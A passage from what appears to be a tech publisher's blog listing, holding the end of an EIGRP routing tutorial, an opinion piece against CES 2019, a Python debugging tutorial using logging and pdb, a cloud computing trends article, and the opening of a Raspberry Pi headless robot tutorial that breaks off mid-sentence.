Interface Serial0/0/1, changed state to down %DUAL-5-NBRCHANGE: IP-EIGRP 100: Neighbor 10.1.1.5 (Serial0/0/1) is down: interface down R4#sh ip route Gateway of last resort is not set 10.0.0.0/30 is subnetted, 5 subnets D 10.1.1.8 [90/2172416] via 10.1.1.25, 02:57:14, FastEthernet0/1 C 10.1.1.12 is directly connected, Serial0/0/0 D 10.1.1.16 [90/2172416] via 10.1.1.25, 02:57:14, FastEthernet0/1 D 10.1.1.20 [90/2172416] via 10.1.1.13, 02:57:15, Serial0/0/0 C 10.1.1.24 is directly connected, FastEthernet0/1 D 192.168.1.0/24 [90/2174976] via 10.1.1.13, 02:57:14, Serial0/0/0 D 192.168.2.0/24 [90/30720] via 10.1.1.25, 02:57:14, FastEthernet0/1 D 192.168.3.0/24 [90/2172416] via 10.1.1.13, 02:57:15, Serial0/0/0 C 192.168.4.0/24 is directly connected, FastEthernet0/0 Only one route exists, which is 10.1.1.13. It had the same metric as 10.1.1.5. So, in this situation, there was no need to query the topology table, since an existing alternate route already existed in the routing table. But, let's verify this with the traceroute command: R4#traceroute 10.1.1.20 Type escape sequence to abort. Tracing the route to 10.1.1.20 1 10.1.1.13 0 msec 5 msec 1 msec (alternate path) 1 10.1.1.5 7msec 1 msec 6 msec (original path) Since it only had one path to get to the 10.1.1.20 network, it was quicker in getting there, but when it had multiple paths, it took longer. Now I know we are talking about milliseconds, but still, it is a delay, none the less. So, what does this tell us? Redundancy is not always a good thing. This is a full-mesh topology, which is very costly and we are running into delays. So, be careful in your design of the network. There is such a thing as too much redundancy and you can easily create Layer 3 loops and delays. We looked at the routing table, but not the topology table, so I am going to turn on the s0/0/0 interface again and look at the routing table once more to make sure all is as it was and then look at the topology table. Almost immediately after turning on the s0/0/0 interface on R1, I receive the following message: R4# %LINK-5-CHANGED: Interface Serial0/0/1, changed state to up %LINEPROTO-5-UPDOWN: Line protocol on Interface Serial0/0/1, changed state to up %DUAL-5-NBRCHANGE: IP-EIGRP 100: Neighbor 10.1.1.5 (Serial0/0/1) is up: new adjacency Let us peek at the routing table on R4: R4#sh ip route Gateway of last resort is not set 10.0.0.0/30 is subnetted, 6 subnets C 10.1.1.4 is directly connected, Serial0/0/1 D 10.1.1.8 [90/2172416] via 10.1.1.25, 03:08:05, FastEthernet0/1 C 10.1.1.12 is directly connected, Serial0/0/0 D 10.1.1.16 [90/2172416] via 10.1.1.25, 03:08:05, FastEthernet0/1 D 10.1.1.20 [90/2172416] via 10.1.1.13, 03:08:05, Serial0/0/0 [90/2172416] via 10.1.1.5, 00:01:45, Serial0/0/1 C 10.1.1.24 is directly connected, FastEthernet0/1 D 192.168.1.0/24 [90/2172416] via 10.1.1.5, 00:01:45, Serial0/0/1 D 192.168.2.0/24 [90/30720] via 10.1.1.25, 03:08:05, FastEthernet0/1 D 192.168.3.0/24 [90/2172416] via 10.1.1.13, 03:08:05, Serial0/0/0 C 192.168.4.0/24 is directly connected, FastEthernet0/0 Notice that the first path in the network is through 10.1.1.13 and not 10.1.1.5, as before. Now let us look at the topology table: Keep in mind that the topology has all possible routes to all destination networks. Only the ones with the lowest FD make it to the routing table and earn the title of the successor route. If you notice the highlighted networks, they are the same as the ones on the routing table. They both have the exact same metric, so they would both earn the title of successor route. But let's analyze another network. Let's choose that last one on the list, 192.168.3.0. It has multiple routes, but the metrics are not the same. If you notice, the FD is 2172416, so 10.1.1.13 would be the successor route, but 10.1.1.5 has a metric of 2174976, which truly makes it a feasible successor and will remain in the topology table. So, what does that mean to us? Well, if the successor route was to go down, then it would have to query the topology table in order to acquire an alternate path. What does the routing table show us about the 192.168.3.0 network, from the R3 perspective? R4#sh ip route D 192.168.3.0/24 [90/2172416] via 10.1.1.13, 03:28:10, Serial0/0/0 There is only one route, the one with the lowest FD, so it's true that, in this case, if this route goes down, a query to the topology table must take place. So, you see it all depends on how you set up your network topology; you may have a feasible successor, or you may not. So, you must analyze the network you are working with to make it an effective network. We have not even changed the bandwidth of any of the interfaces or used the variance command in order to include other routes in our load balancing. Thus, in this article, we covered, how EIGRP works, its features, and configuring EIGRP for single autonomous systems and multiple autonomous systems. To know more about designing and implementing subnetted IPv4 and IPv6 addressing schemes, and more, check out the book  CCNA Routing and Switching 200-125 Certification Guide. Using IPv6 on Packet Tracer IPv6 support to be automatically rolled out for most Netify Application Delivery Network users IPv6, Unix Domain Sockets, and Network Interfaces
Read more
  • 0
  • 0
  • 10713

article-image-ces-2019-is-bullshit-we-dont-need-after-2018s-techlash
Richard Gall
08 Jan 2019
6 min read
Save for later

CES 2019 is bullshit we don't need after 2018's techlash

Richard Gall
08 Jan 2019
6 min read
The asinine charade that is CES is running in Las Vegas this week. Describing itself as 'the global stage of innovation', CES attempts to set the agenda for a new year in tech. While ostensibly it's an opportunity to see how technology might impact the lives of all of us over the next decade (or more), it is, in truth, a vapid carnival that does nothing but make the technology industry look stupid. Okay, perhaps I'm being a fun sponge: what's wrong with smart doorbells, internet connected planks of wood and other madcap ideas? Well, nothing really - but those inventions are only the tip of the iceberg. Disagree? Don't worry: you can find the biggest announcements from day one of CES 2019 here. What CES gets wrong Where CES really gets it wrong - and where it drives down a dead end of vacuity - is how it showcases the mind numbing rush to productize and then commercialize some of the really serious developments that could transform the world in a way that is ultimately far less trivial than the glitz and glamor of the way it is presented in the media would suggest. This isn't to say that there there won't be important news and interesting discussions to come out of CES. But even the more interesting topics can be diluted, becoming buzzwords for marketers to latch onto. As Wired remarks on Twitter, "the term AI-powered is used loosely and is almost always a marketing ploy, whether or not a product is impacted by AI." In the same thread, the publication's account also notes that 5G, another big theme for the event, won't be widely available for at least another 12 months. https://twitter.com/WIRED/status/1082294957979910144 Ultimately, what this tells us is that the focus of CES isn't really technology - not in the sense of how we build it and how we should use it. Instead, it is an event dedicated to the ways we can sell it. Perhaps in previous years, the gleeful excitement of CES was nothing but a bit of light as we recover from the holiday period. But this year it's different. 2018 was a year of reckoning in tech, as a range of scandals emerged that underlined the ways in which exciting technological innovation can be misused and deployed against the very people we assume it should be helping. From the Cambridge Analytica scandal to the controversy surrounding Amazon's Rekognition, Google's Project Dragonfly, and Microsoft's relationship with ICE, 2018 was a year that made it clearer than ever that buried somewhere beneath novel and amusing inventions, and better quality television screens are a set of interests that have little interest in making life better for people. The corporate glamor of CES 2019 is just kitsch It's not news that there are certain organisations and institutions that don't have the interests of the majority at heart. But CES 2019 does take on a new complexion in the shadow of all that has happened in 2019. The question 'what's the point of all this' takes on a more serious edge. When you add in the dissent that has come from a growing part of the Silicon Valley workforce, CES 2019 starts to look like an event that, much like many industry leaders, wants to bury the messy and complex reality of building software in favor of marketing buzz. In The Unbearable Lightness of Being, the author Milan Kundera describes kitsch as "the absolute denial of shit." It's following this definition that you can see CES as a kitsch event. This is because the it pushes the decisions and inevitable trade offs that go into developing new technologies and products into the shadows. It doesn't take negative consequences seriously. It's all just 'shit' that should be ignored. This all adds up to a message that seems to be: better doesn't even need to be built. It's here already, no risks, no challenges. Developers don't really feature at CES. That's not necessarily a problem - after all, it's not an event for them, and what developer wants to spend time hearing marketers talk about AI? But if 2018 has taught us anything, it's that a culture of commercialization that refuses to consider consequences other than what can be done in the service of business growth can be immensely damaging. It hurts people, and it might even be hurting democracy. Okay, the way to correct things probably isn't to simply invite more engineers to CES. But by the same token, CES is hardly helping things either. Everything important is happening outside the event Everything important seems to be happening at the periphery of this year's CES, in some instances quite literally outside the building. Apple's ad, for example, might have been a clever piece of branding, but it has captured the attention of the world. Arguably, it's more memorable than much of what's happening inside the event. And although it's possible to be cynical, it does nevertheless raise important questions about a number of companies attitudes to user data. https://twitter.com/NateIngraham/status/1081612316532064257 Another big talking point as this year's event began is who isn't present. Due to the government shutdown a number of officials that were due to attend and speak have had to cancel. This acts as a reminder of the wider context in which CES 2019 is taking place, in which a nativist government looks set on controlling controlling who and how people move across borders. It also highlights how euphemistic the phrase 'consumer technology' really is. TVs and cloud connected toilets might take the headlines, but its government surveillance that will likely have the biggest impact on our lives in the future. Not that any of this seemed to matter to Gary Shapiro, the Chief Executive of the Consumer Technology Association (the organization that puts on CES). Speaking to the BBC, Shapiro said: “It’s embarrassing to be on the world stage with a dominant event in the world of technology, and our federal government... can't be there to host their colleague government executives from around the world.” Shapiro's frustration is understandable from an organizer's perspective. But it also betrays the apparent ethos of CES: what's happening outside doesn't matter. We all deserve better than CES 2019 The new products on show at CES 2019 won't make everything better. There's a chance they will make everything worse. Arguably, the more blindly optimistic we are that they'll make things better, the more likely they are to make things worse. It's only by thinking through complex questions, and taking time to consider the possible consequences of our decision making as developers, product managers, or business people that we can actually be sure that things will get better. This doesn't mean we need to stop getting excited about new inventions and innovations. But things like smart cities and driverless cars pose a whole range of issues that shouldn't be buried in the optimistic schmaltz of events like CES. They need care and attention from policy makers, designers, software engineers, and many others to ensure they are actually going to help to build a better world for people.
Read more
  • 0
  • 0
  • 20214

article-image-learn-how-to-debug-in-python-tutorial
Bhagyashree R
08 Jan 2019
16 min read
Save for later

Learn how to debug in Python [Tutorial]

Bhagyashree R
08 Jan 2019
16 min read
Writing code isn't easy. Even the best programmer in the world can't foresee any possible alternative and flow of the code.  This means that executing our code will always produce surprises and unexpected behavior. Some will be very evident and others will be very subtle, but the ability to identify and remove these defects in the code is critical to building solid software. These defects in software are known as bugs, and therefore removing them is called debugging. Inspecting the code just by reading it is not great. There are always surprises, and complex code is difficult to follow. That's why the ability to debug by stopping execution and taking a look at the current state of things is important. This article is an excerpt from a book written by Jaime Buelta titled Python Automation Cookbook.  The Python Automation Cookbook helps you develop a clear understanding of how to automate your business processes using Python, including detecting opportunities by scraping the web, analyzing information to generate automatic spreadsheets reports with graphs, and communicating with automatically generated emails. To follow along with the examples implemented in the article, you can find the code on the book's GitHub repository. In this article, we will see some of the tools and techniques for debugging, and apply them specifically to Python scripts. The scripts will have some bugs that we will fix as part of the recipe. Debugging through logging A simple, yet very effective, debugging approach is to output variables and other information at strategic parts of your code to follow the flow of the program. The simplest form of this approach is called print debugging or inserting print statements at certain points to print the value of variables or points while debugging. But taking this technique a little bit further and combining it with the logging techniques allows us to create a semi-permanent trace of the execution of the program, which can be really useful when detecting issues in a running program. Getting ready Download the debug_logging.py file from GitHub. It contains an implementation of the bubble sort algorithm, which is the simplest way to sort a list of elements. It iterates several times over the list, and on each iteration, two adjacent values are checked and interchanged, so the bigger one is after the smaller. This makes the bigger values ascend like bubbles in the list. When run, it checks the following list to verify that it is correct: assert [1, 2, 3, 4, 7, 10] == bubble_sort([3, 7, 10, 2, 4, 1]) How to do it... Run the debug_logging.py script and check whether it fails: $ python debug_logging.py INFO:Sorting the list: [3, 7, 10, 2, 4, 1] INFO:Sorted list: [2, 3, 4, 7, 10, 1] Traceback (most recent call last): File "debug_logging.py", line 17, in <module> assert [1, 2, 3, 4, 7, 10] == bubble_sort([3, 7, 10, 2, 4, 1]) AssertionError Enable the debug logging, changing the second line of the debug_logging.py script: logging.basicConfig(format='%(levelname)s:%(message)s', level=logging.INFO) Change the preceding line to the following one: logging.basicConfig(format='%(levelname)s:%(message)s', level=logging.DEBUG) Note the different level. Run the script again, with more information inside: $ python debug_logging.py INFO:Sorting the list: [3, 7, 10, 2, 4, 1] DEBUG:alist: [3, 7, 10, 2, 4, 1] DEBUG:alist: [3, 7, 10, 2, 4, 1] DEBUG:alist: [3, 7, 2, 10, 4, 1] DEBUG:alist: [3, 7, 2, 4, 10, 1] DEBUG:alist: [3, 7, 2, 4, 10, 1] DEBUG:alist: [3, 2, 7, 4, 10, 1] DEBUG:alist: [3, 2, 4, 7, 10, 1] DEBUG:alist: [2, 3, 4, 7, 10, 1] DEBUG:alist: [2, 3, 4, 7, 10, 1] DEBUG:alist: [2, 3, 4, 7, 10, 1] INFO:Sorted list : [2, 3, 4, 7, 10, 1] Traceback (most recent call last): File "debug_logging.py", line 17, in <module> assert [1, 2, 3, 4, 7, 10] == bubble_sort([3, 7, 10, 2, 4, 1]) AssertionError After analyzing the output, we realize that the last element of the list is not sorted. We analyze the code and discover an off-by-one error in line 7. Do you see it? Let's fix it by changing the following line: for passnum in reversed(range(len(alist) - 1)): Change the preceding line to the following one: for passnum in reversed(range(len(alist))): (Notice the removal of the -1 operation.)  Run it again and you will see that it works as expected. The debug logs are not displayed here: $ python debug_logging.py INFO:Sorting the list: [3, 7, 10, 2, 4, 1] ... INFO:Sorted list : [1, 2, 3, 4, 7, 10] How it works... Step 1 presents the script and shows that the code is faulty, as it's not properly sorting the list. The script already has some logs to show the start and end result, as well as some debug logs that show each intermediate step. In step 2, we activate the display of the DEBUG logs, as in step 1 only the INFO ones were shown. Step 3 runs the script again, this time displaying extra information, showing that the last element in the list is not sorted. The bug is an off-by-one error, a very common kind of error, as it should iterate to the whole size of the list. This is fixed in step 4. Step 5 shows that the fixed script runs correctly. Debugging with breakpoints Python has a ready-to-go debugger called pdb. Given that Python code is interpreted, this means that stopping the execution of the code at any point is possible by setting a breakpoint, which will jump into a command line where any code can be used to analyze the situation and execute any number of instructions. Let's see how to do it. Getting ready Download the debug_algorithm.py script, available from GitHub. The code checks whether numbers follow certain properties: def valid(candidate): if candidate <= 1: return False lower = candidate - 1 while lower > 1: if candidate / lower == candidate // lower: return False lower -= 1 return True assert not valid(1) assert valid(3) assert not valid(15) assert not valid(18) assert not valid(50) assert valid(53) It is possible that you recognize what the code is doing but bear with me so that we can analyze it interactively. How to do it... Run the code to see all the assertions are valid: $ python debug_algorithm.py Add  breakpoint(), after the while loop, just before line 7, resulting in the following: while lower > 1: breakpoint() if candidate / lower == candidate // lower:  Execute the code again, and see that it stops at the breakpoint, entering into the interactive Pdb mode: $ python debug_algorithm.py > .../debug_algorithm.py(8)valid() -> if candidate / lower == candidate // lower: (Pdb) Check the value of the candidate and the two operations. This line is checking whether the dividing of candidate by lower is an integer (the float and integer division is the same): (Pdb) candidate 3 (Pdb) candidate / lower 1.5 (Pdb) candidate // lower 1 Continue to the next instruction with n. See that it ends the while loop and returns True: (Pdb) n > ...debug_algorithm.py(10)valid() -> lower -= 1 (Pdb) n > ...debug_algorithm.py(6)valid() -> while lower > 1: (Pdb) n > ...debug_algorithm.py(12)valid() -> return True (Pdb) n --Return-- > ...debug_algorithm.py(12)valid()->True -> return True Continue the execution until another breakpoint is found with c. Note that this is the next call to valid(), which has 15 as an input: (Pdb) c > ...debug_algorithm.py(8)valid() -> if candidate / lower == candidate // lower: (Pdb) candidate 15 (Pdb) lower 14 Continue running and inspecting the numbers until what the valid function is doing makes sense. Are you able to find out what the code does? (If you can't, don't worry and check the next section.) When you're done, exit with q. This stops the execution: (Pdb) q ... bdb.BdbQuit How it works... The code is, as you probably know already, checking whether a number is a prime number. It tries to divide the number by all integers lower than it. If at any point is divisible, it returns a False result, because it's not a prime. After checking the general execution in step 1, in step 2, we introduced a breakpoint in the code. When the code is executed in step 3, it stops at the breakpoint position, entering into an interactive mode. In the interactive mode, we can inspect the values of any variable as well as perform any kind of operation. As demonstrated in step 4, sometimes, a line of code can be better analyzed by reproducing its parts. The code can be inspected and regular operations can be executed in the command line. The next line of code can be executed by calling n(ext), as done in step 5 several times, to see the flow of the code. Step 6 shows how to resume the execution with the c(ontinue) command in order, to stop in the next breakpoint. All these operations can be iterated to see the flow and values, and to understand what the code is doing at any point. The execution can be stopped with q(uit), as demonstrated in step 7. Improving your debugging skills In this recipe, we will analyze a small script that replicates a call to an external service, analyzing it and fixing some bugs. We will show different techniques to improve the debugging. The script will ping some personal names to an internet server (httpbin.org, a test site) to get them back, simulating its retrieval from an external server. It will then split them into first and last name and prepare them to be sorted by surname. Finally, it will sort them. The script contains several bugs that we will detect and fix. Getting ready For this recipe, we will use the requests and parse modules and include them in our virtual environment: $ echo "requests==2.18.3" >> requirements.txt $ echo "parse==1.8.2" >> requirements.txt $ pip install -r requirements.txt The debug_skills.py script is available from GitHub. Note that it contains bugs that we will fix as part of this recipe. How to do it... Run the script, which will generate an error: $ python debug_skills.py Traceback (most recent call last): File "debug_skills.py", line 26, in <module> raise Exception(f'Error accessing server: {result}') Exception: Error accessing server: <Response [405]> Analyze the status code. We get 405, which means that the method we sent is not allowed. We inspect the code and realize that for the call in line 24, we used GET when the proper one is POST (as described in the URL). Replace the code with the following: # ERROR Step 2. Using .get when it should be .post # (old) result = requests.get('http://httpbin.org/post', json=data) result = requests.post('http://httpbin.org/post', json=data) We keep the old buggy code commented with (old) for clarity of changes. Run the code again, which will produce a different error: $ python debug_skills.py Traceback (most recent call last): File "debug_skills_solved.py", line 34, in <module> first_name, last_name = full_name.split() ValueError: too many values to unpack (expected 2) Insert a breakpoint in line 33, one preceding the error. Run it again and enter into debugging mode: $ python debug_skills_solved.py ..debug_skills.py(35)<module>() -> first_name, last_name = full_name.split() (Pdb) n > ...debug_skills.py(36)<module>() -> ready_name = f'{last_name}, {first_name}' (Pdb) c > ...debug_skills.py(34)<module>() -> breakpoint() Running n does not produce an error, meaning that it's not the first value. After a few runs on c, we realize that this is not the correct approach, as we don't know what input is the one generating the error. Instead, we wrap the line with a try...except block and produce a breakpoint at that point: try: first_name, last_name = full_name.split() except: breakpoint() We run the code again. This time the code stops at the moment the data produced an error: $ python debug_skills.py > ...debug_skills.py(38)<module>() -> ready_name = f'{last_name}, {first_name}' (Pdb) full_name 'John Paul Smith' The cause is now clear, line 35 only allows us to split two words, but raises an error if a middle name is added. After some testing, we settle into this line to fix it: # ERROR Step 6 split only two words. Some names has middle names # (old) first_name, last_name = full_name.split() first_name, last_name = full_name.rsplit(maxsplit=1) We run the script again. Be sure to remove the breakpoint and try..except block. This time, it generates a list of names! And they are sorted alphabetically by surname. However, a few of the names look incorrect: $ python debug_skills_solved.py ['Berg, Keagan', 'Cordova, Mai', 'Craig, Michael', 'Garc\\u00eda, Roc\\u00edo', 'Mccabe, Fathima', "O'Carroll, S\\u00e9amus", 'Pate, Poppy-Mae', 'Rennie, Vivienne', 'Smith, John Paul', 'Smyth, John', 'Sullivan, Roman'] Who's called O'Carroll, S\\u00e9amus? To analyze this particular case, but skip the rest, we must create an if condition to break only for that name in line 33. Notice the in to avoid having to be totally correct: full_name = parse.search('"custname": "{name}"', raw_result)['name'] if "O'Carroll" in full_name: breakpoint() Run the script once more. The breakpoint stops at the proper moment: $ python debug_skills.py > debug_skills.py(38)<module>() -> first_name, last_name = full_name.rsplit(maxsplit=1) (Pdb) full_name "S\\u00e9amus O'Carroll" Move upward in the code and check the different variables: (Pdb) full_name "S\\u00e9amus O'Carroll" (Pdb) raw_result '{"custname": "S\\u00e9amus O\'Carroll"}' (Pdb) result.json() {'args': {}, 'data': '{"custname": "S\\u00e9amus O\'Carroll"}', 'files': {}, 'form': {}, 'headers': {'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'close', 'Content-Length': '37', 'Content-Type': 'application/json', 'Host': 'httpbin.org', 'User-Agent': 'python-requests/2.18.3'}, 'json': {'custname': "Séamus O'Carroll"}, 'origin': '89.100.17.159', 'url': 'http://httpbin.org/post'} In the result.json() dictionary, there's actually a different field that seems to be rendering the name properly, which is called 'json'. Let's look at it in detail; we can see that it's a dictionary: (Pdb) result.json()['json'] {'custname': "Séamus O'Carroll"} (Pdb) type(result.json()['json']) <class 'dict'> Change the code, instead of parsing the raw value in 'data', use directly the 'json' field from the result. This simplifies the code, which is great! # ERROR Step 11. Obtain the value from a raw value. Use # the decoded JSON instead # raw_result = result.json()['data'] # Extract the name from the result # full_name = parse.search('"custname": "{name}"', raw_result)['name'] raw_result = result.json()['json'] full_name = raw_result['custname'] Run the code again. Remember to remove the breakpoint: $ python debug_skills.py ['Berg, Keagan', 'Cordova, Mai', 'Craig, Michael', 'García, Rocío', 'Mccabe, Fathima', "O'Carroll, Séamus", 'Pate, Poppy-Mae', 'Rennie, Vivienne', 'Smith, John Paul', 'Smyth, John', 'Sullivan, Roman'] This time, it's all correct! You have successfully debugged the program! How it works... The structure of the recipe is divided into three different problems. Let's analyze it in small blocks: First error—Wrong call to the external service: After showing the first error in step 1, we read with care the resulting error, saying that the server is returning a 405 status code. This corresponds to a method not allowed, indicating that our calling method is not correct. Inspect the following line: result = requests.get('http://httpbin.org/post', json=data) It gives us the indication that we are using a GET call to one URL that's defined for POST, so we make the change in step 2. We run the code in step 3 to find the next problem. Second error—Wrong handling of middle names: In step 3, we get an error of too many values to unpack. We create a breakpoint to analyze the data in step 4 at this point but discover that not all the data produces this error. The analysis done in step 4 shows that it may be very confusing to stop the execution when an error is not produced, having to continue until it does. We know that the error is produced at this point, but only for certain kind of data. As we know that the error is being produced at some point, we capture it in a try..except block in step 5. When the exception is produced, we trigger the breakpoint. This makes step 6 execution of the script to stop when the full_name is 'John Paul Smith'. This produces an error as the split expects two elements, not three. This is fixed in step 7, allowing everything except the last word to be part of the first name, grouping any middle name(s) into the first element. This fits our purpose for this program, to sort by the last name. The following line does that with rsplit: first_name, last_name = full_name.rsplit(maxsplit=1) It divides the text by words, starting from the right and making a maximum of one split, guaranteeing that only two elements will be returned. When the code is changed, step 8 runs the code again to discover the next error. Third error—Using a wrong returned value by the external service: Running the code in step 8 displays the list and does not produce any errors. But, examining the results, we can see that some of the names are incorrectly processed. We pick one of the examples in step 9 and create a conditional breakpoint. We only activate the breakpoint if the data fulfills the if condition. The code is run again in step 10. From there, once validated that the data is as expected, we worked backward to find the root of the problem. Step 11 analyzes previous values and the code up to that point, trying to find out what lead to the incorrect value. We then discover that we used the wrong field in the returned value from the result from the server. The value in the json field is better for this task and it's already parsed for us. Step 12 checks the value and sees how it should be used. In step 13, we change the code to adjust. Notice that the parse module is no longer needed and that the code is actually cleaner using the json field. Once this is fixed, the code is run again in step 14. Finally, the code is doing what's expected, sorting the names alphabetically by surname. Notice that the other name that contained strange characters is fixed as well. To summarize, this article discussed different methods and tips to help in the debugging process and ensure the quality of your software. It leverages the great introspection capabilities of Python and its out-of-the-box debugging tools for fixing problems and producing solid automated software. If you found this post useful, do check out the book, Python Automation Cookbook.  This book helps you develop a clear understanding of how to automate your business processes using Python, including detecting opportunities by scraping the web, analyzing information to generate automatic spreadsheets reports with graphs, and communicating with automatically generated emails. Getting started with Web Scraping using Python [Tutorial] How to perform sentiment analysis using Python [Tutorial] How to predict viral content using random forest regression in Python [Tutorial]
Read more
  • 0
  • 0
  • 13413
article-image-cloud-computing-trends-in-2019
Guest Contributor
07 Jan 2019
8 min read
Save for later

Cloud computing trends in 2019

Guest Contributor
07 Jan 2019
8 min read
Cloud computing is a rapidly growing technology that many organizations are adopting to enable their digital transformation. As per the latest Gartner report, the cloud tech services market is projected to grow 17.3% ($206 billion) in 2019, up from $175.8 billion in 2018 and by 2022, 90% of organizations will be using cloud services. In today’s world, Cloud technology is a trending buzzword among business environments. It provides exciting new opportunities for businesses to compete on a global scale and is redefining the way we do business. It enables a user to store and share data like applications, files, and more to remote locations. These features have been realized by all business owners, from startup to well-established organizations, and they have already started using cloud computing. How Cloud technology helps businesses Reduced Cost One of the most obvious advantages small businesses can get by shifting to the cloud is saving money. It can provide small business with services at affordable and scalable prices. Virtualization expands the value of physical equipment, which means companies can achieve more with less. Therefore, an organization can see a significant decline in power consumption, rack space, IT requirements, and more. As a result, there is lower maintenance, installation, hardware, support & upgrade costs. For small businesses, particularly, those savings are essential. Enhanced Flexibility Cloud can access data and related files from any location and from any device at any time with an internet connection. As the working process is changing to flexible and remote working, it is essential to provide work-related data access to employees, even when they are not at a workplace. Cloud computing not only helps employees to work outside of the office premises but also allows employers to manage their business as and when required. Also, enhanced flexibility & mobility in cloud technology can lead to additional cost savings. For example, an employer can select to execute BYOD (bring your own device). Therefore, employees can bring and work on their own devices which they are comfortable in.. Secured Data Improved data security is another asset of cloud computing. With traditional data storage systems, the data can be easily stolen or damaged. There can also be more chances for serious cyber attacks like viruses, malware, and hacking. Human errors and power outages can also affect data security. However, if you use cloud computing, you will get the advantages of improved data security. In the cloud, the data is protected in various ways such as anti-virus, encryption methods, and many more. Additionally, to reduce the chance of data loss, the cloud services help you to remain in compliance with HIPAA, PCI, and other regulations. Effective Collaboration Effective collaboration is possible through the cloud which helps small businesses to track and oversee workflow and progress for effective results. There are many cloud collaboration tools available in the market such as Google Drive, Salesforce, Basecamp, Hive, etc. These tools allow users to create, edit, save and share documents for workplace collaboration. A user can also constrain the access of these materials. Greater Integration Cloud-based business solutions can create various simplified integration opportunities with numerous cloud-based providers. They can also get benefits of specialized services that integrate with back-office operations such as HR, accounting, and marketing. This type of integration makes business owners concentrate on the core areas of a business. Scalability One of the great aspects of cloud-based services is their scalability. Currently, a small business may require limited storage, mobility, and more. But in future, needs & requirements will increase significantly in parallel with the growth of the business.  Considering that growth does not always occur linearly, cloud-based solutions can accommodate all sudden and increased requirements of the organization. Cloud-based services have the flexibility to scale up or to scale down. This feature ensures that all your requirements are served according to your budget plans. Cloud Computing Trends in 2019 Hybrid & Multi-Cloud Solutions Hybrid Cloud will become the dominant business model in the future. For organizations, the public cloud cannot be a good fit for all type of solutions and shifting everything to the cloud can be a difficult task as they have certain requirements. The Hybrid Cloud model offers a transition solution that blends the current on-premises infrastructure with open cloud & private cloud services. Thus, organizations will be able to shift to the cloud technology at their own pace while being effective and flexible. Multi-Cloud is the next step in the cloud evolution. It enables users to control and run an application, workload, or data on any cloud (private, public and hybrid) based on their technical requirements. Thus, a company can have multiple public and private clouds or multiple hybrid clouds, all either connected together or not. We can expect multi-cloud strategies to dominate in the coming days. Backup and Disaster Recovery According to Spiceworks report,  15% of the cloud budget is allocated to Backup and Disaster Recovery (DR) solutions, which is the highest budget allocation, followed by email hosting and productivity tools. This huge percentage impacts the shared responsibility model that public cloud providers operate on. Public cloud providers, like as AWS (Amazon Web Services ), Microsoft Azure, Google Cloud are responsible for the availability of Backup and DR solutions and security of the infrastructure, while the users are in charge for their data protection and compliance. Serverless Computing Serverless Computing is gaining more popularity and will continue to do so in 2019. It is a procedure utilized by Cloud users, who request a container PaaS (Platform as a Service), and Cloud supplier charges for the PaaS as required. The customer does not need to buy or rent services before and doesn't need to configure them. The Cloud is responsible for providing the platform, it’s configuration, and a wide range of helpful tools for designing applications, and working with data. Data Containers The process of Data Container usage will become easier in 2019. Containers are more popular for transferring data, they store and organize virtual objects, and resolve the issues of having software run reliably while transferring the data from one system to another. However, there are some confinements. While containers are used to transport, they can only be used with servers having compatible operating system “kernels.” Artificial Intelligence Platforms The utilization of AI to process Big Data is one of the more important upgrades in collecting business intelligence data and giving a superior comprehension of how business functions. AI platform supports a faster, more effective, and more efficient approach to work together with data scientists and other team members. It can help to reduce costs in a variety of ways, such as making simple tasks automated, preventing the duplication of effort, and taking over some expensive labor tasks, such as copying or extraction of data. Edge computing Edge computing is a systematic approach to execute data processing at the edge of the network to streamline cloud computing. It is a result of ever increased use of IoT devices. Edge is essential to run real-time services as it streamlines the flow of traffic from IoT devices and provides real-time data analytics and analysis. Hence, it is also on the rise in 2019. Service mesh Service mesh is a dedicated system layer to enhance service to service communication across microservices applications. It's a new and emerging class of service management for the inter-microservice communication complexity and provides observability and tracing in a seamless way. As containers become more prevalent for cloud-based application development, the requirement for service mesh is increasing significantly. Service meshes can help oversee traffic through service discovery, load balancing, routing, and observability. Service meshes attempt to diminish the complexity of containers and improve network functionality. Cloud Security As we see the rise in technology, security is obviously another serious consideration. With the introduction of the GDPR (General Data Protection Regulation) security concerns have risen much higher and are the essential thing to look after. Many businesses are shifting to cloud computing without any serious consideration of its security compliance protocols. Therefore, GDPR will be an important thing in 2019 and the organization must ensure that their data practices are both safe and compliant. Conclusion As we discussed above, cloud technology is capable of providing better data storage, data security, collaboration, and it also changes the workflow to help small business owners to take better decisions. Finally, cloud connectivity is all about convenience, and streamlining workflow to help any business become more flexible, efficient, productive, and successful. If you want to set your business up for success, this might be the time to transition to cloud-based services. Author Bio Amarendra Babu L loves pursuing excellence through writing and has a passion for technology. He is presently working as a content contributor for Mindmajix.com and Tekslate.com. He is a tech-geek and love to explore new opportunities. His work has been published on various sites related to Big Data, Business Analytics & Intelligence, Blockchain, Cloud Computing, Data Science, AI & ML, Project Management, and more. You can reach him at amarendrabl18@gmail.com. He is also available on Linkedin. 8 programming languages to learn in 2019 18 people in tech every programmer and software engineer need to follow in 2019 We discuss the key trends for web and app developers in 2019 [Podcast]
Read more
  • 0
  • 0
  • 42518

article-image-setting-up-a-raspberry-pi-for-a-robot-headless-by-default-tutorial
Prasad Ramesh
07 Jan 2019
12 min read
Save for later

Setting up a Raspberry Pi for a robot - Headless by Default [Tutorial]

Prasad Ramesh
07 Jan 2019
12 min read
In this tutorial, you will learn why the Raspberry Pi controller on a robot should be wireless, or headless; what headless means; and why it's useful in robotics. You will see how to set up a Raspberry Pi as a headless device from the beginning, and how to connect to this Raspberry Pi once on the network, and then send your first instructions to it. This article is an excerpt from a book written by Danny Staple titled Learn Robotics Programming. In this book, you will learn you'll gain experience of building a next-generation collaboration robot What does headless mean and why? A headless system is a computer designed to be used from another computer via a network, for when keyboard, screen, and mouse access to a device is inconvenient. Headless access is used for server systems and for building robots. Refer to the following diagram: The preceding diagram shows a system with a head where a user can sit in front of the device. You would need to take a screen, keyboard, and mouse with your robot—not very mobile. You may be able to attach/detach them as required, but this is also inconvenient and adds bulk. There are systems designed to dock with Raspberry Pis like this and are portable, but when a robot moves, you'd need to disconnect or move with the robot. I have seen, at some events, a robot with a tiny screen attached and someone using a wireless keyboard and mouse as an option. However, in this article we are going to focus on using a robot as a headless device. Take a look at the following diagram: The Raspberry Pi in the preceding diagram is mounted on a robot as a headless device. This Raspberry Pi is connected to batteries and motors, but not encumbered by a screen and keyboard; those are handled by another computer. The Pi is connected wirelessly to a network, which could be through a laptop. Code, instructions, and information are sent to and from the Raspberry Pi via this wireless network. To interact with it, you use the screen and keyboard on your laptop. However, you would usually 